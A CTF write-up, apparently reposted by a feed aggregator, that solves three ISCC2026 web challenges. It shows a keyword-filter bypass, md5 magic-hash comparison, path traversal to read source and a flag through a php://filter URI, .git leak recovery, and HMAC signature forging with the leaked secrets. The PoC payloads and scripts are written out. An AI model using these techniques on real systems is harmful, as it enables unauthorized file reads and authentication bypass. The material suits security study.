ISCC2026web

博客园_首页

Plist 二进制格式 Milvus 和 PGVector，哪个更好？ OpenClaw 已过时？在 VS Code 中运行 Hermes Agent！第30篇文章：一个大三计科生的自白 Manim如何在数学公式中完美显示中文？ Docker 部署 RocketMQ 5 并发编程核心概念辨析 C#事务处理最佳实践：别再让“主表存了、明细丢了”的破事发生 CLI 是什么？为什么大厂突然集体卷命令行？【从0到1构建一个ClaudeAgent】协作-自主Agent UIImageView 设置图片不生效的原因排查最小二乘问题详解20：无先验约束下的增量式SFM自由网平差痞子衡嵌入式：大话双核i.MXRT1180之XIP应用里借助MU实现可靠Flash IAP的方法 AI Chat 封装， SemanticKerne.AiProvider.Unified 已发布 Windows下右键编辑js文件无法打开记事本——在注册表中使用环境变量在后台服务中使用 Scoped 服务，为什么总是报错？ H200 安装驱动并使用sglang启动模型 wireshark 抓包Trap上报告警内容我用 AI 辅助开发了一系列小工具（2）：图片压缩工具 [A Primer On MC and CC] 2.1 Memory Consistency 1 - 指令重排序和 SC 模型 Oracle数据库SCN推进技术详解与实践指南玩转控件:封装个带图片的Label控件 Claude Code 4.7 真正该升级的不是模型，而是你的工作流前端小白一句话，AI 帮我做了个颜值拉满的桌面媒体播放器。当代码不再是门槛，一句话编程就是现实。 5. WorkBuddy: 小龙虾的灵魂三件套，让你的小龙虾不只是工具 SQLite 分片方案实战：三种分片策略的深度对比告别简陋 UI！一款基于 Fluent Design 和基于 WinUI 的开源免费、现代化的 Avalonia UI 控件库关于二进制排列组合枚举的总结 AI开发-python-LangGraph框架（3-27-LangGraph从零实现大模型智能决策工作流） ElasticSearch主分片和副本分片概念详解【002】HTTPS 粗解：证书、TLS 握手与对后端配置的影响 Hermes Agent 一周暴涨五万 Star，但我劝你别急着追明明连接的是Redis的DB0，为什么能查到DB3的数据？【从0到1构建一个ClaudeAgent】协作-Agent团队熟悉电子元器件之后，电子小白下一步该怎么走？ MAF快速入门（23）通过C#类定义Skills .NET 高级开发 | 手写一个对象映射框架 FastAPI数据库ORM怎么选？我肝了三个Demo后，终于不再纠结了 mysqldump 参数拾遗：在遗忘与铭记之间 C# .NET 周刊｜2026年3月5期 Claude code入门 - 陈彦斌一文学习入门 ThingsBoard 开源物联网平台 GitHub 热门项目 | 2026年04月16日如何为GIT设置全局勾子，为每次提交追加信息 Number.isFinite和isFinite与isNaN()和Number.isNaN的区别 PortSwigger SQL注入LAB2 推荐一个测试人必备的Skills，从功能到性能全搞定（附详细实操和安装下载方式）筑基期：掌握Odoo基础核心知识点02（Odoo XML 开发方式详解） GLM模型这么火，咱们用vllm也咧一个呗！深入理解 AbortController：从底层原理到跨语言设计哲学字符串学习笔记多租户系统框架的基础模块设计和分析设计 Apache SeaTunnel Zeta 为什么能做到“又快又稳”？ AI开发-python-LangGraph框架（3-26-LangGraph基本概念及第一个简单样例） Vue 3 组件通信，别只会用 Props 和 Emits 了，这几个狠活儿你得看看 ElasticSearch7.X版本配置密码用Manim实现动态交点计算--从一个动点问题说起团结引擎+Addressable+Instant Game打包抖音小游戏 function call 实战：让 LLM 自动判断 pod 异常、调用日志工具并完成故障分析 bubseek —— 让 Agent 的足迹，变成团队的洞察通过 C# 读取并导出 PDF 书签如何用 GitHub Actions 实现 Steam 自动化发布【从0到1构建一个ClaudeAgent】并发-后台任务 .NET 高级开发 | 定制 ASP.NET Core 框架电子小白：什么是运算放大器（运放） zero2Agent：面向大厂面试的 Agent 工程教程，从概念到生产的完整学习路线堆上的ORW HC32F460 USB CDC通信异常：非对齐访问异常排查 20260413-Hyperbridge 攻击事件：发生在默克尔山上的验证绕过那些喊着AI 要淘汰你的人，正在靠你的焦虑赚大钱！深度学习进阶（八）Swin Transformer 最小二乘问题详解19：带先验约束的增量式SFM优化与实现 SnapTranslate 3.0 正式发布：全局划词翻译 + 完整英语学习闭环，一站式搞定查词、记词、复习工作的意义、工作的困难认知再思考 .NET + AI 进阶实战：基于类的技能开发 - 打造可治理的 Agent 能力模块【从0到1构建一个ClaudeAgent】规划与协调-技能上周热点回顾（4.6-4.12）电子小白的工具三件套：面包板、杜邦线、万能板单表五亿数据的查询优化 | Mysql、StarRocks 2. WorkBuddy：从“我是谁”到“帮我干活” C# 如何减少代码运行时间：7 个实战技巧基于HelixToolkit.SharpDX 渲染3D模型 - 笺上知微从零开始的双臂具身VLA起源及现阶段发展综述 - SkyXZ 记对 xonsh shell 的使用, 脚本编写, 迁移及调优 - pluvium27 受够了Vibe Coding的失控？换个起点，让AI事半功倍从开始配置漏洞环境到漏洞复现流程 - 難しい关于10年工作经验的程序员对OpenClaw的实战经验分享以及看法 - 虚无境 Any metadata 的内存布局 C# .NET 周刊｜2026年3月2期 - InCerry 我帮你测过了，测试圈排名第二的 Skill 依然很牛逼 Skill Discovery | 无监督技能发现的经典工作总结 - MoonOut 上下文工程是什么？过时了么？一文讲明白！ - 一枫说码开了 TUN 模式还是直连？90% 的人都踩过这个坑 AScript扩展多种脚本语言 - rockey627 AI 学习笔记：Agent 的记忆机制你能被装进一个文件里吗？——7 万人把同事"蒸馏"成了 AI - 我没有三颗心脏 Claude Code 通关手册（七）：给 AI 装上技能包——Skills 完全指南 - 暮色之狐在浏览器中快速编辑代码：VSCode Web 集成实践 - Newbe36524 蒸馏自己 skill？基于 Deepseek 的蒸馏器，丐版蒸馏方式，简单便捷 - To_Carpe_Diem Spring AI Aliababa和AgentScope，哪个更好？ - 苏三说技术

ISCC2026web

E73RN4L · 2026-05-06 · via 博客园_首页

web

消失的密钥

解

输入11测试下

[AUTH] 认证失败。意外的令牌格式。请阅读任务说明。
[系统日志] 输入已处理。
结果字符串：'11'
状态：已拒绝
提示：系统遇到了意外的序列。请重新验证您的凭证。

令牌和凭证，很难不考虑下cookie，但实际啥也没有

题目说对key敏感，get和post参数key都没反应

直接输入key呢？

和传入11对比发现key被删掉了

双写绕过

?step1=kkeyey

[AUTH] 第一阶段成功。主常量：1337
[SYS] 错误：POST 数据结构“a”缺失。终端已锁定。

注意：该终端界面已弃用。需要手动注入。

尝试POST a=11

回显 [SYS] 数据类型不匹配或常量错误。认证已终止。

然后不知道怎么做了，其实正确顺序应该先扫目录

/?source

 <?php
// index.php
error_reporting(0);
include("flag.php");

if (isset($_GET['source'])) {
    highlight_file(__FILE__);
    exit();
}

$HIDDEN_KEY = "1337.php_is_funny"; 
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Internal Access Terminal</title>
    <style>
        body { background-color: #0a0c10; color: #c9d1d9; font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; display: flex; justify-content: center; padding-top: 10vh; }
        .terminal { width: 800px; background: #161b22; border: 1px solid #30363d; border-radius: 8px; padding: 0; overflow: hidden; box-shadow: 0 10px 30px rgba(0,0,0,0.5); }
        .top-bar { background: #21262d; padding: 10px 15px; color: #8b949e; font-size: 12px; border-bottom: 1px solid #30363d; display: flex; justify-content: space-between; }
        .content { padding: 30px; line-height: 1.6; }
        .status-msg { margin: 15px 0; padding: 10px; border-radius: 4px; font-size: 14px; }
        .status-err { background: rgba(248, 81, 73, 0.1); border-left: 4px solid #f85149; color: #f85149; }
        .status-ok { background: rgba(63, 185, 80, 0.1); border-left: 4px solid #3fb950; color: #3fb950; }
        
        .debug-log { background: #0d1117; border: 1px dashed #30363d; color: #8b949e; padding: 15px; font-family: 'Courier New', monospace; font-size: 13px; margin-top: 10px; }
        .debug-accent { color: #58a6ff; }
        .hint-text { color: #7d8590; font-size: 12px; font-style: italic; margin-top: 10px; display: block; }
        
        input[type="text"] { background: #0d1117; border: 1px solid #30363d; color: #c9d1d9; padding: 8px; width: 250px; outline: none; }
        input[type="submit"] { background: #21262d; border: 1px solid #30363d; color: #c9d1d9; padding: 8px 20px; cursor: pointer; border-radius: 4px; }
        input[type="submit"]:hover { background: #30363d; }
        code { color: #ffa657; background: rgba(255,166,87,0.1); padding: 2px 4px; }
    </style>
</head>
<body>

<div class="terminal">
    <div class="top-bar">
        <span>ST_OS v4.2.1-RELEASE (AMD64)</span>
        <span>AUTH_STATUS: UNAUTHORIZED</span>
    </div>
    <div class="content">
        <h2>System Authentication</h2>
        <?php
        // --- LEVEL 1 ---
        if (!isset($_GET['step1'])) {
            echo "<p>Please enter authorization key:</p>";
            echo "<form method='GET'><input type='text' name='step1'><input type='submit' value='Login'></form>";
        } else {
            $step1 = $_GET['step1'];

            $filtered = str_replace("key", "", $step1);

            if ($filtered === "key") {
                echo "<div class='status-ok'>[AUTH] Phase 1 Success. Master Const: 1337</div>";
                
                $a = $_POST['a'] ?? null;

                if (!$a) {
                    echo "<div class='status-err'>[SYS] Error: POST data structure 'a' missing. Terminal locked.</div>";
                    echo "<p class='hint'>Note: The terminal UI is deprecated. Manual injection required.</p>";
                } else {
                    $obj_a = (object)$a;
                    $user_key = $obj_a->key;

                    if (isset($user_key) && $user_key === "1337") {
                        echo "<div class='status-ok'>[AUTH] Phase 2 Identity Confirmed. Hash protocol initiated.</div>";
                        echo "<hr>";
                        
                        $val_a = $_GET['a'] ?? "";
                        $val_b = $_GET['b'] ?? "";

                        if ($val_a !== "" && $val_b !== "" && $val_a !== $val_b) {
                            if (md5($val_a) == md5($val_b)) {
                                echo "<div class='status-ok' style='border: 2px dashed #3fb950;'>";
                                echo "CREDENTIAL_FOUND: <code>{$flag}</code>";
                                echo "</div>";
                            } else {
                                echo "<div class='status-err'>[SYS] Hash collision check failed.</div>";
                            }
                        } else {
                            echo "<div class='status-err'>[SYS] Collision check pending. Collision pending. (Params 'a', 'b' required via GET. )</div>";
                        }
                    } else {
                        echo "<div class='status-err'>[SYS] Data type mismatch or incorrect constant. Authentication terminated.</div>";
                    }
                }
            } else {

                echo "<div class='status-err'>[AUTH] Authentication failed. Unexpected token format.Please read the task description</div>";
                echo "<div class='debug-log'>";
                echo "<span class='debug-accent'>[SYSTEM LOG]</span> Input processed.<br>";
                echo "Resultant String: '<span style='color: #fff;'>" . htmlspecialchars($filtered) . "</span>'<br>";
                echo "Status: REJECTED";
                echo "</div>";
                echo "<span class='hint-text'>Hint: The system encountered an unexpected sequence. Please re-verify your credentials.</span>";
                echo "<br><form method='GET'><input type='text' name='step1' placeholder='Retry...'><input type='submit' value='Login'></form>";
            }
        }
        ?>
    </div>
</div>

</body>
</html>

其中

$obj_a = (object)$a;
$user_key = $obj_a->key;

if (isset($user_key) && $user_key === "1337")

需要POST a[key]=1337

还有md5碰撞

240610708
QNKCDZO

Poc：

http://39.105.213.28:12601/?step1=kkeyey&a=240610708&b=QNKCDZO
POST a[key]=1337

JSON Beautifier

解

提供了两种输入方式，json和uri

随便传点东西上去看看逻辑吧

回显

{
  "success": true,
  "preview_id": "preview_6cad920cb2359af0",
  "preview_file": "preview_6cad920cb2359af0.tmp"
}

直接/preview_6cad920cb2359af0.tmp

回显404，提示：网站通常会通过 /robots.txt 告诉爬虫哪些地方“不该去”

访问/robots.txt

User-agent: *
Disallow: /api/
Disallow: /api/preview.php
Disallow: /api/beautify.php

# nothing to see here :)

/api/preview.php

JSON Preview API

Usage:
  GET /api/preview.php?file=<name>

有些东西离这里有点远，也许换个路径层级再看看，会遇到更有意思的文件。

/api/beautify.php

{
  "service": "JSON Beautifier",
  "usage": "POST JSON: {\"data\":\"...\",\"preview_type\":\"raw|data_uri\"}",
  "preview_api": "/api/preview.php?file=<preview_id>.tmp"
}

访问/api/preview.php?file=preview_6cad920cb2359af0.tmp

确实回显了输入的内容

尝试json注入探测一下会不会被解析

失败

换个思路，既然有?file=.... 那一定得尝试下任意文件读取了

常见的绝对路径都无法读取，回显not found

抓个包看看

存在一个响应头

有一个名为X-DocRoot的http头，问下ds

所以网页根目录很有可能是在/var/www/html/src

尝试文件读取/var/www/html/src/api/preview.php

还是not found

这里应该路径穿越

../../var/www/html/src/api/preview.php

原因是啥你别管，gpt给我说的

?file=../../var/www/html/src/api/preview.php

<?php
declare(strict_types=1);

header('Content-Type: text/plain; charset=utf-8');
header('X-Powered-By: JSON Preview');

error_reporting(0);

require_once __DIR__ . '/config.php';

function out(int $code, string $body): void {
    http_response_code($code);
    echo $body;
    exit;
}

function startsWith(string $s, string $prefix): bool {
    return strncmp($s, $prefix, strlen($prefix)) === 0;
}

function schemeOf(string $uri): ?string {
    $p = strpos($uri, '://');
    if ($p === false) return null;
    $scheme = substr($uri, 0, $p);
    if (preg_match('/^[a-zA-Z][a-zA-Z0-9+\.\-]*$/', $scheme) !== 1) {
        return null;
    }
    return strtolower($scheme);
}

if ($_SERVER['REQUEST_METHOD'] !== 'GET') {
    out(405, "Method Not Allowed\n");
}

if (!isset($_GET['file']) || trim((string)$_GET['file']) === '') {
    out(200,
        "JSON Preview API\n\n" .
        "Usage:\n" .
        "  GET /api/preview.php?file=<name>\n\n" .
        "有些东西离这里有点远，也许换个路径层级再看看，会遇到更有意思的文件。\n"
    );
}

$file = (string)$_GET['file'];
$file = str_replace("\0", '', $file);

$requested = TMP_DIR . '/' . $file;

if (strpos($requested, TMP_DIR) !== 0) {
    out(400, "Bad path\n");
}

$real = realpath($requested);
if ($real === false || !is_file($real)) {
    out(404, "Not Found\n");
}

$tmpPrefix = rtrim(TMP_DIR, '/') . '/';
$srcPrefix = rtrim(SRC_API_DIR, '/') . '/';

if (!startsWith($real, $tmpPrefix) && !startsWith($real, $srcPrefix)) {
    out(403, "Forbidden\n");
}

$content = file_get_contents($real);
if ($content === false) {
    out(500, "Read error\n");
}

$isTmp = startsWith($real, $tmpPrefix) && preg_match('/\.tmp$/', $real) === 1;
$line = trim((string)$content);

if ($isTmp) {
    $scheme = schemeOf($line);
    if ($scheme !== null) {
        $deny = [
            'http', 'https', 'ftp', 'ftps',
            'phar', 'expect',
        ];
        if (in_array($scheme, $deny, true)) {
            out(403, "Forbidden scheme\n");
        }

        $pos = stripos($line, 'resource=');
        if ($pos === false) {
            out(400, "Bad reference\n");
        }
       
        $resource = rawurldecode(substr($line, $pos + 9));
        if ($resource !== FLAG_PATH) {
            out(403, "Forbidden resource\n");
        }

        $data = @file_get_contents($line);
        if ($data === false) {
            out(500, "Resource read error\n");
        }
        echo $data;
        exit;
    }
}

echo $content;

?file=../../var/www/html/src/api/config.php

<?php
declare(strict_types=1);

const APACHE_DEFAULT_DOCROOT = '/var/www/html';
const APACHE_DOCROOT = '/var/www/html/src';

const TMP_DIR = '/tmp/json_preview';
const SRC_API_DIR = APACHE_DOCROOT . '/api';
const FLAG_PATH = '/secret/flag';

关键的是：如果你读的是一个 .tmp 文件，并且这个文件内容像一个 URI，它会额外走一段“二次读取”逻辑
这段逻辑会拦 http/https/phar/expect，但没拦 php://filter
它还要求 URI 里的 resource= 必须等于 /secret/flag

所以最后利用非常短：

1. 用 beautify.php 的 data_uri 模式，往 /tmp/json_preview/ 写一个临时文件
   内容不是普通文本，而是：

php://filter/convert.base64-encode/resource=/secret/flag

2. 再用 preview.php?file=<那个临时文件> 去读它
3. preview.php 看到这是 .tmp，且内容是 URI，就会执行 file_get_contents($line)
4. 因为 resource=/secret/flag 正好满足白名单，于是把 flag 读出来

Poc

写入uri

data:text/plain;base64,cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vc2VjcmV0L2ZsYWc=

preview.php读取后解码

夜班审计台

知识点补充

1. `/.git/refs/heads/master`

含义：存储 master 分支（或 main 分支）当前指向的最新提交对象（commit）的 40 位 SHA-1 哈希值
示例内容：

d4f3a7b8e2c1f6a9b4c3d2e1f0a7b6c5d4e3f2a1

作用：这个哈希值代表该分支最新的一次 commit，Git 通过这个哈希值找到对应的提交对象及其完整代码快照

2. `/.git/HEAD`

含义：指向当前检出的分支或提交（即你正在工作的位置）
示例内容：

text

ref: refs/heads/master

作用：告诉 Git 当前工作目录对应哪个引用（通常是分支名）

题目

某存储团队夜里临时挂出了一套“审计查询页”，看起来像能查东西，实际上只会一本正经地回你几句模板话。白天值班的人说一切正常，真正不安分的细节，往往藏在他们以为没人会翻的地方。

解

先看眼源码，有一句

<script src="/static/main.js"></script>

跟过去看看/static/main.js

document.addEventListener("DOMContentLoaded", () => {
  window.__buildTrace = "/.git/HEAD";
});

访问/.git/HEAD，下载文件

ref: refs/heads/master

访问/.git/refs/heads/master，下载文件

9fdf9b412e7cfe179e59d28f25f47cffd68484e7

既然有.git泄露就去拉一下备份

(注意这里不能用baiying的githack，因为它基本依赖 /.git/index，而本题的/.git/index是404，也不能用WangYihang的GitHacker，会把靶机搞炸，难绷。可以用Git_Extract，下载链接：https://github.com/gakki429/Git_Extract，注意是python2)

python 1.py http://39.105.213.28:49106/.git/

legacy_probe_stub.py

# legacy_probe_stub.py
# old night-shift fallback verifier kept for rollback testing

SERVER_SECRET = "ISCC_SERVER_SECRET_REAL"
LOCAL_ONLY = ("127.0.0.1", "::1")
AUDIT_NODE = "core-storage-01"
TIME_WINDOW = 60


def verify_probe(node_id: str, ts: int, sign: str) -> bool:
    """
    internal/audit fallback:
      msg = f"{node_id}:{ts}"
      expected = HMAC_SHA256_hex(SERVER_SECRET, msg)
      abs(now-ts) <= 60
      remote_addr in LOCAL_ONLY
    """
    raise NotImplementedError


class PixelRunner:
    def __init__(self):
        self.energy = 3
        self.score = 0

    def tick(self, move: str):
        if move in {"left", "right", "jump"}:
            self.score += 1
            self.energy = max(0, self.energy - 1)
        return self.score, self.energy


def demo_loop(script):
    game = PixelRunner()
    for move in script:
        game.tick(move)
    return game.score

legacy_probe_stub.py.55cf35

# legacy_probe_stub.py
# compact handover note for the audit platform cut-over

DEFAULT_AUDITOR = ("auditor", "audit2025")
INTERNAL_DEV_SECRET = "ISCC_2026_JWT_DEBUG_KEY_#9527"
JWT_ACCEPTED = ["RS256", "HS256"]


def decode_ticket(token):
    """
    current branch:
      if header.alg == "RS256": verify with audit_rsa_pub.pem
      elif header.alg == "HS256": verify with INTERNAL_DEV_SECRET
    normal login still issues role=user
    """
    raise NotImplementedError


def handover():
    note = []
    note.append("dashboard link to /auditor/nodes stays role-gated")
    note.append("legacy fallback verifier was removed from this revision")
    note.append("if night shift asks for old sign rule, inspect previous revision")
    return note


class TinyMaze:
    MAP = [
        "#########",
        "#..#....#",
        "#..#.#..#",
        "#....#..#",
        "#########",
    ]

    def __init__(self, start=(1, 1)):
        self.pos = list(start)

    def move(self, dx, dy):
        x = self.pos[0] + dx
        y = self.pos[1] + dy
        if self.MAP[y][x] != "#":
            self.pos = [x, y]
        return tuple(self.pos)

使用auditor/audit2025登录

拿到jwt

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhdWRpdG9yIiwicm9sZSI6InVzZXIiLCJpYXQiOjE3NzgwNTczMDAsImV4cCI6MTc3ODA1OTEwMCwiaXNzIjoiXHU1OTFjXHU3M2VkXHU1YmExXHU4YmExXHU1M2YwIn0.b9NTcIfPXe5dqna8oewpxYsClLlMJ-L8fVzB5ynMdrkBSYprWrtttkEjOlAYepGdPVvSBJZS4_-wjoqqBKvfqQ69LyzvsnyWwN5qPmb9jsdVJsXiywCC3iP3X557V8RdN_T6n8h4Uk5MvvMxlBDLudtVfn3xuAjWyJxVsyn5JBINhQJJnpAL__5iIn1PPk8NfvlMh3jFg9PZ0V1qNaBEzPtAvB-1EX3-aimSjaL5QaBBj4zXaSHEUJeGPnTUb692SIcXJqO7u9-JqMSKsmL2Gh0iBK3PZw_An2q5ZPEa3_g6jclmsycOFLu9IGkAf6hFRZO_E5GtIi4ncOfyVwBc-w

伪造jwt

这时回头看上一版提交，发现旧代码里直接写了签名逻辑：

SERVER_SECRET = "ISCC_SERVER_SECRET_REAL"
LOCAL_ONLY = ("127.0.0.1", "::1")
AUDIT_NODE = "core-storage-01"
TIME_WINDOW = 60


def verify_probe(node_id: str, ts: int, sign: str) -> bool:
    """
    internal/audit fallback:
      msg = f"{node_id}:{ts}"
      expected = HMAC_SHA256_hex(SERVER_SECRET, msg)
      abs(now-ts) <= 60
      remote_addr in LOCAL_ONLY
    """
    raise NotImplementedError

这里几乎把内部接口认证规则全送了：

密钥：ISCC_SERVER_SECRET_REAL
节点名：core-storage-01
签名：HMAC_SHA256(secret, f"{node_id}:{ts}")

import hmac, hashlib, time

node_id = "core-storage-01"
ts = str(int(time.time()))
sign = hmac.new(
      b"ISCC_SERVER_SECRET_REAL",
      f"{node_id}:{ts}".encode(),
      hashlib.sha256
  ).hexdigest()

print(node_id, ts, sign)

拿去提交，拿到flag

此内容由惯性聚合(RSS阅读器)自动聚合整理，仅供阅读参考。原文来自 — 版权归原作者所有。

推荐订阅源

博客园_首页

web

消失的密钥

解

JSON Beautifier

解

夜班审计台

知识点补充

1. /.git/refs/heads/master

2. /.git/HEAD

题目

解

1. `/.git/refs/heads/master`

2. `/.git/HEAD`